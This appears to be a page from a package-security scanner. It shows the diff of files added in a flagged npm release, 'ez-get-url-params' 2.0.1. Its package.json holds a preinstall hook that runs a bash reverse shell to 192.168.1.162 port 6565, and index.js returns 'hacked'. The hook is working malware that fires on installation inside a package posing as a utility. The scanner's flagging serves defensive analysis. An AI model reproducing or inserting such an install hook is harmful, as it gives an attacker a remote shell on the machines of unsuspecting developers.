ez-get-url-params 2.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of ez-get-url-params might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/index.js +3 -0
  3. package/package.json +12 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ test
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports.hacked = function () {
2
+ return "hacked"
3
+ }
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ez-get-url-params",
3
+ "version": "2.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "bash -i >& /dev/tcp/192.168.1.162/6565 0>&1"
9
+ },
10
+ "author": "0xsapra",
11
+ "license": "ISC"
12
+ }